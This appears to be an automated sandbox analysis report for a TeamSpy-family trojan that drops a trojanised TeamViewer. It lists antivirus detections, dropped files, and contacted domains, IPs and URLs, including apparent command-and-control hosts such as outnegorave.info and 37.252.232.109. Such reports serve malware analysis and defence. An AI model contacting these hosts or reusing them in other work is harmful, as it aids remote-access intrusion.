Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
77Etc0bR2v.exe38%VirustotalBrowse
77Etc0bR2v.exe11%MetadefenderBrowse
77Etc0bR2v.exe38%ReversingLabsWin32.Trojan.Teamspy

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll27%ReversingLabsWin32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
1.2.77Etc0bR2v.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
1.0.77Etc0bR2v.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=100000010%Avira URL Cloudsafe
http://37.252.232.109/0%Avira URL Cloudsafe
https://outnegorave.info/60%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=100000020%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://outnegorave.info/B8C631A8/0%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate20%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001s0%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001q0%Avira URL Cloudsafe
https://outnegorave.info/0%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001l0%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGateP0%Avira URL Cloudsafe
https://outnegorave.info/8C631A8/0%Avira URL Cloudsafe
http://go.teamviewer.comn00%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/700%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://outnegorave.info/allControlPanel.dll0%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=100000%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate00%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
https://outnegorave.info/B8C631A8/87096&p=100000010%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/s0%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/x0%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateY0%Avira URL Cloudsafe
http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001l0%Avira URL Cloudsafe
http://37.252.232.109/32172969&client=DynGate&p=10000002v0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
outnegorave.info
172.67.205.33
truefalse
    		high
    master1.teamviewer.com
    		185.188.32.1
    		truefalse
      		high
      ping3.dyngate.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001false
        • Avira URL Cloud: safe
        		unknown
        http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ==false
          		high
          http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002false
          • Avira URL Cloud: safe
          		unknown
          http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGatefalse
          • Avira URL Cloud: safe
          		unknown
          https://outnegorave.info/B8C631A8/false
          • Avira URL Cloud: safe
          		unknown
          http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002false
            		high
            http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001false
              		high
              http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001false
                		high
                http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCipfalse
                  		high
                  http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002false
                    		high
                    http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGatefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFBfalse
                      		high
                      http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002false
                        		high
                        http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdrfalse
                          		high
                          http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://37.252.232.109/TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mastr1.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=19TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                              		high
                              http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                		high
                                https://outnegorave.info/6TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.teamviewer.com/help/support.aspxK77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                    		high
                                    https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campaiTeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001hTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://ocsp.sectigo.com077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://corp.roblox.com/contact/svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                          		high
                                          http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZTeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412076158.0000000005766000.00000004.00000001.sdmpfalse
                                            		high
                                            http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate2TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                              		high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001tTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                		high
                                                http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.TeamViewer.com/help77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                    		high
                                                    http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001pTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://mastr1.teamviewer.com/din.aspx?s=3272978&client=DynGate&p=1000TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.TeamViewer.com/download77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                            		high
                                                            http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001JTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.TeamViewer.comTeamViewer.exe, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpfalse
                                                                		high
                                                                http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001BTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001sTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001qTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://outnegorave.info/TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.TeamViewer.com#http://www.TeamViewer.com/licensing77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                    		high
                                                                    http://www.teamviewer.com/ja/company/shutdown.aspx?version=TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://en.help.roblox.com/hc/en-ussvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001lTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001XTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGatePTeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001PIxTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://outnegorave.info/8C631A8/TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://go.teamviewer.comn077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://outnegorave.info/B8C631A8/70TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventuresvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001oTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.teamviewer.com/help/connectivity.aspx:77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                  		high
                                                                                  https://sectigo.com/CPS077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.teamviewer.com/favicon.ico77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                    		high
                                                                                    https://www.roblox.com/developsvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQSTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.415730284.000000000576A000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://outnegorave.info/allControlPanel.dllTeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://crl.ver)svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749228779.00000282E9C16000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://nsis.sf.net/NSIS_ErrorError77Etc0bR2v.exefalse
                                                                                          		high
                                                                                          https://corp.roblox.com/parents/svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.teamviewer.com/download/beta.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                              		high
                                                                                              http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                		high
                                                                                                http://www.teamviewer.comTeamviewer_Resource_ja.dll.1.drfalse
                                                                                                  		high
                                                                                                  http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.teamviewer.com/licensing/commercialuse.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                    		high
                                                                                                    http://nsis.sf.net/NSIS_Error77Etc0bR2v.exefalse
                                                                                                      		high
                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://outnegorave.info/B8C631A8/87096&p=10000001TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTTeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpfalse
                                                                                                        		high
